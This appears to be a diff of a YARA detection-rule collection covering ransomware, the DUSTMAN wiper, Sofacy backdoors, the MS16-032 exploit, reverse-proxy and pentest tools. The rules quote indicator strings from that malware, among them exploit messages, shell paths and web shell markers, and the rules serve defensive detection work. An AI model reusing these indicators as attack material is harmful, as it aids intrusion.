-		$r5 = "---END KEY R_R---" fullword ascii
-		$a1 = "+RhRR!-uD8'O&Wjq1_P#Rw<9Oy?n^qSP6N{BngxNK!:TG*}\\|W]o?/]H*8z;26X0" fullword ascii
-		$a2 = "\\\\.\\PHYSICALDRIVE%d" fullword wide
-		$a3 = "WinSta0\\Default" fullword wide
-		$a4 = "%s-%s-%s-%s-%s" fullword wide
-		$a5 = "SOFTWARE\\Microsoft\\Cryptography" fullword wide
-		$c1 = "-backup" fullword wide
-		$c2 = "-force" fullword wide
-		$c3 = "-vmback" fullword wide
-		$c4 = "-list" fullword wide
-		$s1 = ".ragn@r_" wide
-		$s2 = "\\notepad.exe" wide
-		$s3 = "Opera Software" fullword wide
-		$s4 = "Tor browser" fullword wide
+		$doc = "d0cf11e0a1b11ae1"
+		$obj = "\\objupdate"
+		$wsdl = "7700730064006c003d00" nocase
+		$http1 = "68007400740070003a002f002f00" nocase
+		$http2 = "680074007400700073003a002f002f00" nocase
+		$http3 = "6600740070003a002f002f00" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "2c2aab89a4cba444cf2729e2ed61ed4f" and ( ( 2 of ( $f* ) ) and ( 3 of ( $r* ) ) and ( 4 of ( $a* ) ) and ( 2 of ( $c* ) ) and ( 2 of ( $s* ) ) ) )
+		uint32be( 0 ) == 0x7B5C7274 and $obj and $doc and $wsdl and 1 of ( $http* )
 }
-rule SIGNATURE_BASE_KR_Target_Malware_Aug17 : FILE
+rule SIGNATURE_BASE_MAL_ME_Rawdisk_Agent_Jan20_1 : FILE
 {
 	meta:
-		description = "Detects malware that targeted South Korea in Aug 2017 - file MRDqsbuEqGxrgqtbXU.exe"
+		description = "Detects suspicious malware using ElRawDisk"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2a6a7921-953a-502c-9702-b27325b2c3b8"
-		date = "2017-08-23"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/eyalsela/status/900250203097354240"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kr_malware.yar#L11-L35"
+		id = "0efaae51-1407-5039-9e5a-9c2f13d6a971"
+		date = "2020-01-02"
+		modified = "2022-12-21"
+		reference = "Saudi National Cybersecurity Authority - Destructive Attack DUSTMAN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dustman.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "47c3350b489b023687f05f55a09f0092456c87b4beeda563756a99ccd5091b09"
-		score = 75
+		logic_hash = "90345b8358d72b6616c6277222fb1091cb3a88b844391ac3766e7d1ee1192fbe"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "82cada01643a42c8cd9600b8c33f3760d15e5eb6fabec2d531cf13cece095c78"
+		hash1 = "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2"
 
 	strings:
-		$x1 = { 53 00 75 00 63 00 63 00 65 00 00 2F 53 00 6F 00
-               6D 00 65 00 74 00 68 00 69 00 6E 00 67 00 20 00
-               77 00 65 00 6E 00 74 00 20 00 77 00 72 00 6F 00
-               6E 00 67 00 }
-		$x2 = "lnVMODvjSfOQQnfiuFogghlL" fullword ascii
-		$x3 = "E X I T  +R U N A S  /a P P d A T A " fullword ascii
-		$x4 = "uSEsHELLeXECUTE gETeNTRYaSSEMBLY GET" fullword ascii
-		$x5 = "ZahUKBXz" fullword wide
+		$x1 = "\\drv\\agent.plain.pdb" ascii
+		$x2 = " ************** Down With Saudi Kingdom, Down With Bin Salman ************** " fullword ascii
+		$s1 = ".?AVERDError@@" fullword ascii
+		$s2 = "b4b615c28ccd059cf8ed1abf1c71fe03c0354522990af63adf3c911e2287a4b906d47d" fullword wide
+		$s3 = "\\\\?\\ElRawDisk" fullword wide
+		$s4 = "\\??\\c:" wide
+		$op1 = { e9 3d ff ff ff 33 c0 48 89 05 0d ff 00 00 48 8b }
+		$op2 = { 0f b6 0c 01 88 48 34 48 8b 8d a8 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_MSIL_SUSP_OBFUSC_Xorstringsnet : FILE
+rule SIGNATURE_BASE_MAL_ME_Rawdisk_Agent_Jan20_2 : FILE
 {
 	meta:
-		description = "Detects XorStringsNET string encryption, and other obfuscators derived from it"
-		author = "dr4k0nia"
-		id = "f0724ca6-4bfe-5b88-9396-a58aa7461fd6"
-		date = "2023-03-26"
-		modified = "2023-12-05"
-		reference = "https://github.com/dr4k0nia/yara-rules"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_net_xorstrings.yar#L2-L27"
+		description = "Detects suspicious malware using ElRawDisk"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9817fb22-7bed-5869-aa92-66c458b81c7f"
+		date = "2020-01-02"
+		modified = "2022-12-21"
+		reference = "https://twitter.com/jfslowik/status/1212501454549741568?s=09"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dustman.yar#L26-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6d023a80bd8f5709721c3ace8a7230b847ca4bd2a1aff502a25333ffc8bf75ca"
-		score = 75
+		logic_hash = "73e4a88b749e3b2654e9021290932d2e556c29cfa772785b23bebad9f3a3f90a"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		hash1 = "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2"
 
 	strings:
-		$pattern = { 06 1E 58 07 8E 69 FE 17 }
-		$a1 = "_CorDllMain" ascii
-		$a2 = "_CorExeMain" ascii
-		$a3 = "mscorlib" ascii fullword
-		$a4 = ".cctor" ascii fullword
-		$a5 = "System.Private.Corlib" ascii
-		$a6 = "<Module>" ascii fullword
-		$a7 = "<PrivateImplementationsDetails{" ascii
+		$x1 = "\\Release\\Dustman.pdb" ascii
+		$x2 = "/c agent.exe A" fullword ascii
+		$s1 = "C:\\windows\\system32\\cmd.exe" fullword ascii
+		$s2 = "The Magic Word!" fullword ascii
+		$s3 = "Software\\Oracle\\VirtualBox" fullword wide
+		$s4 = "\\assistant.sys" wide
+		$s5 = "Down With Bin Salman" fullword wide
+		$sc1 = { 00 5C 00 5C 00 2E 00 5C 00 25 00 73 }
+		$op1 = { 49 81 c6 ff ff ff 7f 4c 89 b4 24 98 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25MB and $pattern and 2 of ( $a* )
+		uint16( 0 ) == 0x5a4d and filesize <= 3000KB and ( 1 of ( $x* ) or 3 of them )
 }
 rule SIGNATURE_BASE_TA17_293A_Malware_1
 {
@@ -287394,7 +286105,7 @@ rule SIGNATURE_BASE_TA17_293A_Energetic_Bear_Api_Hashing_Tool : FILE
 		description = "Energetic Bear API Hashing Tool"
 		author = "CERT RE Team"
 		id = "4e58800a-9618-5d8b-954c-e843be6002c2"
-		date = "2025-02-08"
+		date = "2025-02-15"
 		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
 		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_293A.yar#L77-L93"
@@ -287558,87447 +286269,89246 @@ rule SIGNATURE_BASE_TA17_293A_Hacktool_Exploit_MS16_032 : FILE
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9b97290300abb68fb48480718e6318ee2cdd4f099aa6438010fb2f44803e0b58"
+		hash1 = "9b97290300abb68fb48480718e6318ee2cdd4f099aa6438010fb2f44803e0b58"
+
+	strings:
+		$x1 = "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread)))" ascii
+		$x2 = "0x00000002, \"C:\\Windows\\System32\\cmd.exe\", \"\"," fullword ascii
+		$x3 = "PowerShell implementation of MS16-032. The exploit targets all vulnerable" fullword ascii
+		$x4 = "If we can't open the process token it's a SYSTEM shell!" fullword ascii
+
+	condition:
+		( filesize < 40KB and 1 of them )
+}
+
+rule SIGNATURE_BASE_Imphash_UPX_Packed_Malware_1_TA17_293A : FILE
+{
+	meta:
+		description = "Detects malware based on Imphash of malware used in TA17-293A"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3ff28f06-8b69-5e8f-ab45-dfa4f6e69812"
+		date = "2017-10-21"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_293A.yar#L206-L217"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "398ccbd5e492fb1efa80dc07900ef77611c4b5bab95f715fce7b5dbeb0aff49d"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a278256fbf2f061cfded7fdd58feded6765fade730374c508adad89282f67d77"
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "d7d745ea39c8c5b82d5e153d3313096c" )
+}
+
+rule SIGNATURE_BASE_Imphash_Malware_2_TA17_293A : HIGHVOL FILE
+{
+	meta:
+		description = "Detects malware based on Imphash of malware used in TA17-293A"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5c9f32a3-8c50-5d46-929b-bbe14697540e"
+		date = "2017-10-21"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_293A.yar#L219-L229"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "5f91c07a9cc65c31eb9fd09bdd2752bc285c5a4b118ffe647391f7d187765de4"
+		score = 75
+		quality = 85
+		tags = "HIGHVOL, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "a8f69eb2cf9f30ea96961c86b4347282" )
+}
+rule SIGNATURE_BASE_Sofacy_Malware_Strangespaces : FILE
+{
+	meta:
+		description = "Detetcs strange strings from Sofacy malware with many spaces"
+		author = "Florian Roth (Nextron Systems)"
+		id = "60f99b88-f256-5289-852c-c0bf27f1cbd4"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L8-L23"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "ee8bbebaa0978d038424cee3775ba312476afa014ce0d57c73d6844f758116ca"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s2 = "Delete Temp Folder Service                                  " fullword wide
+		$s3 = " Operating System                        " fullword wide
+		$s4 = "Microsoft Corporation                                       " fullword wide
+		$s5 = " Microsoft Corporation. All rights reserved.               " fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and 3 of them
+}
+rule SIGNATURE_BASE_Sofacy_Malware_AZZY_Backdoor_1 : FILE
+{
+	meta:
+		description = "AZZY Backdoor - Sample 1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "184dc45e-8014-5dcf-a033-d77586c60fdf"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L25-L40"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "a9dc96d45702538c2086a749ba2fb467ba8d8b603e513bdef62a024dfeb124cb"
+		logic_hash = "9c99f218d856d374423cada147bc38c8319f9ebff1e43e012143fad7af992d29"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "advstorshell.dll" fullword wide
+		$s1 = "advshellstore.dll" fullword ascii
+		$s2 = "Windows Advanced Storage Shell Extension DLL" fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
+}
+rule SIGNATURE_BASE_Sofacy_AZZY_Backdoor_Implant_1 : FILE
+{
+	meta:
+		description = "AZZY Backdoor Implant 4.3 - Sample 1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ec6bf8ca-ccb9-532e-8b0d-1fba59efa2da"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L42-L59"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "1bab1a3e0e501d3c14652ecf60870e483ed4e90e500987c35489f17a44fef26c"
+		logic_hash = "b6ddf1274ed78db0c7183e3cc8063c01e4d011bc2947ec05449f3fd0df2050e7"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "\\tf394kv.dll" wide
+		$s2 = "DWN_DLL_MAIN.dll" fullword ascii
+		$s3 = "?SendDataToServer_2@@YGHPAEKEPAPAEPAK@Z" ascii
+		$s4 = "?Applicate@@YGHXZ" ascii
+		$s5 = "?k@@YGPAUHINSTANCE__@@PBD@Z" ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
+}
+rule SIGNATURE_BASE_Sofacy_AZZY_Backdoor_Helperdll : FILE
+{
+	meta:
+		description = "Dropped C&C helper DLL for AZZY 4.3"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eae089a0-21dc-5d6e-a4bc-7181dc9b8b35"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L61-L76"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "6cd30c85dd8a64ca529c6eab98a757fb326de639a39b597414d5340285ba91c6"
+		logic_hash = "100903551eeacf4266fc97a09949bdafe05e94698bed7cea295c8e970df22ec8"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "snd.dll" fullword ascii
+		$s1 = "InternetExchange" fullword ascii
+		$s2 = "SendData"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen1 : FILE
+{
+	meta:
+		description = "Generic rule to detect Sofacy Malware Collector Stealer"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f9462dd9-f6b6-59f4-a443-12d6f3be444e"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L80-L97"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "1b6693fa45fed5ed001d8fb4b43427c7036d95cb36b125e7242864d000085018"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "4e4606313c423b681e11110ca5ed3a2b2632ec6c556b7ab9642372ae709555f3"
+		hash2 = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
+
+	strings:
+		$s0 = "NvCpld.dll" fullword ascii
+		$s1 = "NvStop" fullword ascii
+		$s2 = "NvStart" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen2 : FILE
+{
+	meta:
+		description = "File collectors / USB stealers - Generic"
+		author = "Florian Roth (Nextron Systems)"
+		id = "03ced94f-de20-56c5-bf17-1ec7d8610684"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L99-L116"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "e917166adf6e1135444f327d8fff6ec6c6a8606d65dda4e24c2f416d23b69d45"
+		hash = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
+		hash = "b1f2d461856bb6f2760785ee1af1a33c71f84986edf7322d3e9bd974ca95f92d"
+		logic_hash = "2086b4119bae17ec984665ea1e49d5f496a2cf6bf05ab507fe0cfb6e28039349"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "msdetltemp.dll" fullword ascii
+		$s2 = "msdeltemp.dll" fullword wide
+		$s3 = "Delete Temp Folder Service" fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+}
+rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen3 : FILE
+{
+	meta:
+		description = "File collectors / USB stealers - Generic"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d2ee1a22-6aae-51fc-9043-a7ba99769376"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L118-L143"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
+		hash = "4e4606313c423b681e11110ca5ed3a2b2632ec6c556b7ab9642372ae709555f3"
+		logic_hash = "8e7f56013629d8b4d0c7600552590e8073deb16d5b6dced11444c2110b88f387"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "NvCpld.dll" fullword ascii
+		$s4 = "NvStart" fullword ascii
+		$s5 = "NvStop" fullword ascii
+		$a1 = "%.4d%.2d%.2d%.2d%.2d%.2d%.2d%.4d" fullword wide
+		$a2 = "IGFSRVC.dll" fullword wide
+		$a3 = "Common User Interface" fullword wide
+		$a4 = "igfsrvc Module" fullword wide
+		$b1 = " Operating System                        " fullword wide
+		$b2 = "Microsoft Corporation                                       " fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and ( all of ( $s* ) and ( all of ( $a* ) or all of ( $b* ) ) )
+}
+rule SIGNATURE_BASE_HKTL_FRP_Apr20_1
+{
+	meta:
+		description = "Detects FRP fast reverse proxy tool often used by threat groups"
+		author = "Florian Roth (Nextron Systems)"
+		id = "55483832-0e0b-5c28-8be5-dbd14ddb50e3"
+		date = "2020-04-07"
+		modified = "2022-11-03"
+		reference = "https://github.com/fatedier/frp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_frp_proxy.yar#L2-L22"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "21f91fd99aed8b62d804504889c41ca77567fd345cf4ea0ef00161eefa9324a7"
+		score = 70
+		quality = 85
+		tags = ""
+		hash1 = "05537c1c4e29db76a24320fb7cb80b189860389cdb16a9dbeb0c8d30d9b37006"
+		hash2 = "08c685c8febb5385f7548c2a64a27bae7123a937c5af958ebc08a3accb29978d"
+
+	strings:
+		$x1 = "frp/vendor/github.com/spf13/" ascii
+		$x2 = "github.com/fatedier/frp/vendor/" ascii
+		$fpg2 = "<html"
+		$fpg3 = "<HTML"
+		$fpg6 = "<?xml"
+
+	condition:
+		1 of ( $x* ) and not 1 of ( $fp* )
+}
+rule SIGNATURE_BASE_HKTL_FRP_INI_Apr20_1 : FILE
+{
+	meta:
+		description = "Detects FRP fast reverse proxy tool INI file often used by threat groups"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5c652c9c-715d-5ba5-821a-3e533b1e78c6"
+		date = "2020-04-07"
+		modified = "2023-12-05"
+		reference = "Chinese Hacktools OpenDir"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_frp_proxy.yar#L24-L44"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "cc997dc876d7a49292b62a0fb4ff12b34dacacfd8a1b90226d6a9aee303cacdf"
+		score = 60
+		quality = 85
+		tags = "FILE"
+		hash1 = "1dabef3c170e4e559c50d603d47fb7f66f6e3da75a65c3435b18175d6e9785bb"
+
+	strings:
+		$h1 = "[common]" ascii
+		$s1 = "server_addr =" ascii fullword
+		$s2 = "remote_port =" ascii fullword
+		$s3 = "[RemoteDesktop]" ascii fullword
+		$s4 = "local_ip = " ascii
+		$s5 = "type = tcp" ascii fullword
+
+	condition:
+		uint16( 0 ) == 0x635b and filesize < 1KB and $h1 at 0 and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_MAC_IPMAC : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5424d3a7-765a-5dfb-9177-d5633f83079f"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L10-L26"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "24d55b6bec5c9fff4cd6f345bacac7abadce1611"
+		logic_hash = "395dfb840346bbf3f68fa198e76349cf65c703b28fd168b85d846d07df1845fe"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "Http://Www.YrYz.Net" fullword wide
+		$s2 = "IpMac.txt" fullword ascii
+		$s3 = "192.168.0.1" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 267KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Getsyskey : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L28-L43"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
+		logic_hash = "1f12ea9d62d4aaf695328fb335445f3dae3996595402586d2ee52098e6727d10"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii
+		$s4 = "The system key file \"%s\" is created." fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Churrasco : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "58873cd6-0c9e-58a0-923a-aca8a1d42017"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L45-L64"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "5a3c935d82a5ff0546eff51bb2ef21c88198f5b8"
+		logic_hash = "f60589bda76367578388cbe6af912c80c9364a7047ed52ca2b4156a1b277e7ca"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "HEAD9 /" ascii
+		$s1 = "logic_er" fullword ascii
+		$s6 = "proggam" fullword ascii
+		$s16 = "DtcGetTransactionManagerExA" fullword ascii
+		$s17 = "GetUserNameA" fullword ascii
+		$s18 = "OLEAUT" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 1276KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Mysql_Injectv1_1_Creak : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file mysql_injectV1.1_Creak.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "39025a57-557a-53c0-bfdb-81fe83f824af"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L66-L81"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "a1f066789f48a76023598c5777752c15f91b76b0"
+		logic_hash = "f61557216a7e90ff9655ad8aea4a9adf0e4435c7a3f7958423e46fd2265bad07"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "1http://192.169.200.200:2217/mysql_inject.php?id=1" fullword ascii
+		$s12 = "OnGetPassword" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 5890KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_ASP_Wshell : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file wshell.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "028136cd-129b-5d58-a4c2-ba730a798c06"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L83-L100"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "3ae33c835e7ea6d9df74fe99fcf1e2fb9490c978"
+		logic_hash = "f6f83acb76248a1b00f1acac621e68888c93b34d4813d8f8613d5d9095c53a8a"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
+		$s1 = "UserPass="
+		$s2 = "VerName="
+		$s3 = "StateName="
+
+	condition:
+		uint16( 0 ) == 0x253c and filesize < 200KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Exp_Iis7 : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file iis7.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "edfafc9a-032a-5ccb-9a1f-faeab0dfa31d"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
